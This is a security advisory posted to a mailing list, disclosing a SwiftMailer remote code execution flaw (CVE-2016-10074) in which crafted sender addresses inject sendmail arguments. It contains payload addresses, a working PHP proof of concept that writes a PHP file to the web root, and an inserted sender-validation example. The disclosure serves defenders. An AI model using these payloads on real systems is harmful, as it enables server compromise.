Date: Wed, 28 Dec 2016 16:57:28 -0200
From: Dawid Golunski <dawid@...alhackers.com>
To: oss-security@...ts.openwall.com
Subject: SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)

SwiftMailer <= 5.4.5-DEV Remote Code Execution
CVE-2016-10074

Discovered by: Dawid Golunski (@...id_golunski)
https://legalhackers.com

Desc:

Independent research uncovered a critical vulnerability in SwiftMailer that
could potentially be used by (unauthenticated) remote attackers to achieve
remote arbitrary code execution in the context of the web server user and
remotely compromise the target web application.

To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the SwiftMailer class.

Despite significant efforts to responsibly disclose the vulnerability
to the vendor (since 2 December), the vulnerability remains unfixed as of
28 December.


The full current advisory at:

https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html

Copy attached to this msg.

The Video PoC will be very similar to:
http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

The SwiftMailer PoC exploit:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt

Updates:
https://twitter.com/dawid_golunski

-- 
Regards,
Dawid Golunski
https://legalhackers.com
t: @dawid_golunski



    __                     __   __  __           __                 
   / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
/_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  
           /____/                                                   



=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2016-10074
- Release date: 28.12.2016
- Revision 1.0
- Severity: Critical
=============================================


I. VULNERABILITY
-------------------------

SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)


II. BACKGROUND
-------------------------

"Swift Mailer is a component-based library for sending e-mails from PHP applications."

"Swift Mailer began back in 2005 as a one-class project for sending mail over SMTP. 
It has since grown into the flexible component-based library that is in development today."

The SwiftMailer library is used by major PHP projects, including some of the
most popular PHP frameworks such as Yii2, Laravel and Symfony.

https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/introduction.rst
https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/overview.rst

Symfony / Yii / Laravel frameworks:

http://symfony.com/doc/current/email.html

https://github.com/yiisoft/yii2-swiftmailer

https://laravel.com/docs/5.1/mail


III. INTRODUCTION
-------------------------

Independent research uncovered a critical vulnerability in SwiftMailer that
could potentially be used by (unauthenticated) remote attackers to achieve 
remote arbitrary code execution in the context of the web server user and 
remotely compromise the target web application.

To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the SwiftMailer class.

Despite significant efforts to responsibly disclose the vulnerability
to the vendor, the vulnerability remains unfixed as of 28 December.

Note: This advisory is limited.
Remaining attack vectors/exploits will be disclosed at a later date to allow
more time for patching.

IV. DESCRIPTION
-------------------------


The SwiftMailer class uses the PHP mail() function as its default transport.

SwiftMailer suffers from the same vulnerability as the one disclosed in
PHPMailer:

http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html


The following Sender address:

"Attacker -Param2 -Param3"@...t.com

would cause SwiftMailer (via the mail() function) to execute /usr/sbin/sendmail
with the following list of arguments:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker -Param2 -Param3@...t.com]

which would not work for the attacker (Param2 and Param3 are passed within
the same argument, argv[3]).


Attackers can, however, break out of argument no. 3 with some extra escaping.

For example, by injecting an extra sequence of \" after the first argument,
the following Sender email:

"Attacker \" -Param2 -Param3"@...t.com

when passed to SwiftMailer (and eventually to the mail() function) would cause
sendmail to be executed with:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@...t.com]


As can be seen, this injects additional parameters (nos. 4 and 5) into the
sendmail command line.


Attackers can exploit this to achieve code execution as shown in the PoC
below.
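As an added defensive illustration (not part of this advisory or of the SwiftMailer project), the PHP helper below shows the kind of application-side check that keeps a user-supplied sender address from carrying extra sendmail arguments through setFrom() into the mail() -f parameter: it rejects anything filter_var() does not accept as an address, and additionally rejects any address containing whitespace, quotes or backslashes, which is what the quoted-local-part payloads above rely on. The function name and the sample addresses are constructed for this example (the obfuscated domains from the advisory are replaced with example.com).

```php
<?php
// Added defensive example, not code from the advisory or from SwiftMailer.
// Validate a user-supplied sender address before it reaches setFrom() and,
// through the mail() transport, the sendmail -f argument.
// Function name and sample addresses are constructed for illustration.

function isSafeSenderAddress(string $address): bool
{
    // Reject anything that is not a syntactically valid address at all.
    if (filter_var($address, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    // Quoted local parts ("..."@host) are RFC-valid, but they are exactly what
    // lets the  \" -oQ... -X...  payload reach sendmail's argv. Reject
    // whitespace, single/double quotes and backslashes outright; ordinary
    // addresses never need them.
    if (preg_match('/[\s"\'\\\\]/', $address) === 1) {
        return false;
    }
    return true;
}

// Constructed sample inputs: one ordinary address and the three payload
// shapes discussed in the advisory.
$samples = [
    'alice@example.com'                                                => true,
    '"Attacker -Param2 -Param3"@example.com'                           => false,
    '"Attacker \" -Param2 -Param3"@example.com'                        => false,
    '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@example.com'  => false,
];

foreach ($samples as $address => $expected) {
    $ok = isSafeSenderAddress($address);
    // Each sample must match the expected verdict; only the first is accepted.
    if ($ok !== $expected) {
        throw new RuntimeException("unexpected verdict for: $address");
    }
    printf("%-68s => %s\n", $address, $ok ? 'accepted' : 'rejected');
}
```

Only addresses that pass this check should be handed to setFrom(); a rejected value is better logged and replaced with a fixed site sender than silently dropped, since repeated rejections are a useful signal that a form is being probed.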



V. PROOF OF CONCEPT EXPLOIT
-------------------------

<?php
 
/*
 
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 
Full Advisory URL:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html

Video PoC
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html


Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == ["@...il.com]


which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
 
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
 
 
See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@...il.com';

// ------------------
 
// mail() param injection via the vulnerability in SwiftMailer

require_once 'lib/swift_required.php';
// Mail transport
$transport = Swift_MailTransport::newInstance();
// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);

// Create a message
$message = Swift_Message::newInstance('Swift PoC exploit')
  ->setFrom(array($email_from => 'PoC Exploit Payload'))
  ->setTo(array('receiver@...ain.org', 'other@...ain.org' => 'A name'))
  ->setBody('Here is the message itself')
  ;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);




~~~~~~~~~~~

The researcher also developed an Unauthenticated RCE exploit for a popular 
open-source application (deployed on the Internet on more than a million servers)
as a PoC for real-world exploitation. It might be published after the vendor has 
fixed the vulnerabilities.

Video PoC:
~~~~~~~~~~~~~

https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html


VI. BUSINESS IMPACT
-------------------------

A successful exploitation could let remote attackers gain access to
the target server in the context of the web server account, which could
lead to a full compromise of the web application.

 
VII. SYSTEMS AFFECTED
-------------------------

All versions of SwiftMailer, including the latest (5.4.5-DEV), are affected.


VIII. SOLUTION / VENDOR RESPONSE
-------------------------


The vulnerability was responsibly disclosed to the SwiftMailer vendor.
The first contact attempts started on the 2nd of December.
Unfortunately the vendor has not fixed the SwiftMailer library to date and
it remains vulnerable.
Because of this, users of SwiftMailer (including various frameworks that make
use of the library) remain at risk.

The vendor was advised by the researcher of the upcoming exploit for another
library (PHPMailer) which, when published along with the new release, would make
it possible for malicious users to "connect the dots" and use the same payloads
to attack SwiftMailer users.

The last contact attempt (resending the tested PoC exploit) was made on Dec 26th,
to which the vendor has not replied.

Since, after the publication of the PHPMailer exploit, other users started to
notice the similarities and file public vulnerability reports, there is no
longer any point in keeping this advisory private.

MITRE assigned the following CVE ID to this vulnerability upon the request
made by the researcher:

CVE-2016-10074

 
IX. REFERENCES
-------------------------

https://legalhackers.com

This (CVE-2016-10074) advisory:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html

Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Exploit code:
The simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt

Other exploits with other attack vectors will be disclosed at a later date to 
allow more time for patching.

CVE-2016-10074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10074

SwiftMailer github

https://github.com/swiftmailer/swiftmailer


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com

Thanks to SecuriTeam for help with disclosing the vulnerability to the vendor.
 
XI. REVISION HISTORY
-------------------------

28.12.2016 - Limited advisory released
 

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

